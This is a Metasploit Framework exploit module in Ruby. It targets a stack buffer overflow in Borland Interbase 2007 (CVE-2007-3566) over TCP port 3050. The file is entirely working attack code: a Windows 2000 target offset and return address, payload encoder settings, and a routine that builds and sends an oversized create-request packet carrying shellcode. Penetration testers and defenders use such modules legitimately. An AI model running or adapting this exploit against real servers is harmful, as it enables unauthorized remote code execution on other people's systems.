### $Id: borland_interbase.rb 9525 2010-06-15 07:18:08Z jduck $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/##
require 'msf/core'class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,'Name' => 'Borland Interbase Create-Request Buffer Overflow','Description'=> %q{
This module exploits a stack buffer overflow in Borland Interbase 2007.
By sending a specially crafted create-request packet, a remote
attacker may be able to execute arbitrary code.},'Author' => 'MC','Version'=> '$Revision: 9525 $','References' =>
[['CVE','2007-3566'],['OSVDB','38602'],['URL','http://dvlabs.tippingpoint.com/advisory/TPTI-07-13'],],'DefaultOptions' =>
{'EXITFUNC' => 'thread',},'Payload'=>
{'Space'=> 850,'BadChars' => "\x00",'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",'EncoderType' => Msf::Encoder::Type::AlphanumUpper,},'Platform' => 'win','Targets'=>
[['Windows 2000 English All / Borland InterBase 2007',{'Offset' => 1266,'Ret' => 0x1002e556 }],# sanctuarylib.dll],'Privileged' => true,'DefaultTarget'=> 0,'DisclosureDate' => 'Jul 24 2007'))
register_options([Opt::RPORT(3050)], self.class)end
def exploit
connect
# Build the exploit buffer.... It's a biggie!
sploit ="\x00\x00\x00\x14"+"\x00\x00\x00\x13"+ rand_text_alpha_upper(target['Offset'])
sploit << payload.encoded + Rex::Arch::X86.jmp_short(6)+ rand_text_alpha_upper(2)
sploit << [target.ret].pack('V')+[0xe8,-850].pack('CV')+ rand_text_alpha_upper(40000)
print_status("Trying target #{target.name}...")
sock.put(sploit)
handler
disconnect
endend
